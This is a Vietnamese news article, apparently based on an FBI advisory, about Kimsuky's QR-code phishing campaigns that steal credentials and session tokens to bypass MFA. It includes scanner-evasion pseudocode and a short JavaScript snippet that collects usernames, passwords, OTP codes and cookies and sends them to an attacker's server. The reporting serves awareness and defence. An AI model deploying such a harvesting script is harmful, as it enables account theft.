Kimsuky Tấn Công Quishing: Rủi Ro Khó Lường Qua QR

Gần đây, nhóm Kimsuky đã triển khai các chiến dịch tấn công lừa đảo mục tiêu (spearphishing) mới, lợi dụng mã QR để thực hiện một cuộc tấn công mạng tinh vi nhắm vào các tổ chức tại Hoa Kỳ. Chiến thuật này, thường được gọi là “Quishing”, giúp các đối tượng đe dọa né tránh các biện pháp bảo mật truyền thống và xâm nhập hệ thống mục tiêu.

Chiến dịch Quishing Mới của Kimsuky: Một Mối đe dọa Mạng Đáng Chú Ý

Mục tiêu và Phương thức Tiếp cận

Cục Điều tra Liên bang (FBI) đã cảnh báo về việc các think tank, tổ chức phi chính phủ (NGO), cơ quan học thuật và các thực thể liên quan đến chính phủ, đặc biệt là những tổ chức có trọng tâm nghiên cứu về một khu vực cụ thể, đang bị nhắm mục tiêu. Các email “Quishing” này ẩn chứa các URL độc hại phía sau hình ảnh mã QR thay vì các liên kết có thể nhấp trực tiếp.

Việc chuyển sang sử dụng mã QR mang lại lợi thế chiến lược cho các đối tượng đe dọa. Nó giúp chuyển hướng nạn nhân khỏi các thiết bị đầu cuối doanh nghiệp được bảo vệ và sang các thiết bị di động ít được giám sát hơn.

Trong các chiến dịch này, các tác nhân của Kimsuky giả mạo các liên hệ đáng tin cậy như cố vấn nước ngoài, nhân viên đại sứ quán hoặc đồng nghiệp nghiên cứu. Email mời mục tiêu quét mã QR để tham gia hội nghị, mở một ổ đĩa “an toàn” hoặc trả lời khảo sát chính sách. Xem thêm thông tin về bảo mật email tại CybersecurityNews.

Kỹ thuật Né tránh và Chuyển hướng Thiết bị

Khi mã QR được quét, nó sẽ âm thầm chuyển hướng người dùng qua cơ sở hạ tầng do kẻ tấn công kiểm soát. Tại đây, thiết bị sẽ được nhận dạng (fingerprint) trước khi tải một cổng đăng nhập giả mạo cho các dịch vụ như Microsoft 365, Google, Okta hoặc cổng VPN.

Các nhà phân tích từ IC3 đã xác định rằng chuỗi mã QR được điều chỉnh để né tránh các kiểm tra bảo mật email thông thường và xác thực đa yếu tố (MFA). Đồng thời, chúng âm thầm thu thập thông tin đăng nhập và các token phiên trình duyệt. Báo cáo chi tiết có thể được tìm thấy tại IC3.gov.

Những hoạt động này thường dẫn đến việc chiếm quyền điều khiển tài khoản hoàn toàn, lạm dụng hộp thư và duy trì quyền truy cập dài hạn vào các tài nguyên đám mây trên toàn mạng lưới của nạn nhân.

Cơ chế Hoạt động của Cuộc Tấn công Quishing

Giai đoạn Nhận dạng và Chuyển hướng

Một cái nhìn sâu hơn về đường dẫn lây nhiễm cho thấy các mã QR ban đầu giải quyết thành các miền chuyển hướng. Các miền này sẽ ghi lại các thuộc tính chính như user-agent, loại hệ điều hành (OS), địa chỉ IP, ngôn ngữ và kích thước màn hình. Các thông tin về mã QR và an ninh mạng có thể tham khảo tại CybersecurityNews.

Logic phía máy chủ sau đó sẽ quyết định liệu có phục vụ một trang lừa đảo được tối ưu hóa cho thiết bị di động hay chuyển hướng nạn nhân đi nơi khác nếu hồ sơ trông giống như một máy quét hoặc môi trường sandbox. Một khối quyết định đơn giản hóa trên máy chủ có thể trông giống như sau:

if (is_scanner_or_sandbox(user_agent, ip_address)) { redirect_to_safe_site();} else { serve_mobile_phishing_page();}

Kỹ thuật Thu thập Thông tin Đăng nhập và Session Token

Khi nạn nhân truy cập trang giả mạo và nhập mật khẩu cũng như mã một lần (OTP), các script của Kimsuky sẽ lấy cả thông tin đăng nhập và bất kỳ cookie phiên nào liên kết với quy trình đăng nhập. Một mẫu JavaScript cơ bản có thể là:

document.addEventListener('submit', function(e) { e.preventDefault(); const username = document.getElementById('username').value; const password = document.getElementById('password').value; const otp = document.getElementById('otp').value; const session_cookies = document.cookie; // Send credentials and cookies to attacker's server fetch('/collect', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ username, password, otp, session_cookies }) });});

Chiếm Quyền Điều khiển Tài khoản và Duy trì Truy cập

Bằng cách phát lại các token này, các tác nhân thực hiện xâm nhập mạng và bỏ qua MFA, tạo hoặc sửa đổi các quy tắc truy cập, thiết lập chuyển tiếp và mật khẩu ứng dụng bên trong tài khoản. Tìm hiểu thêm về cách bỏ qua MFA tại CybersecurityNews.

Từ đó, chúng gửi các mồi nhử dựa trên mã QR mới từ hộp thư bị xâm nhập, làm cho mỗi đợt tấn công mới xuất hiện đáng tin cậy hơn và duy trì quyền truy cập của chúng trong thời gian dài. Đây là một chiến lược hiệu quả để duy trì sự hiện diện và tiếp tục các cuộc tấn công mạng.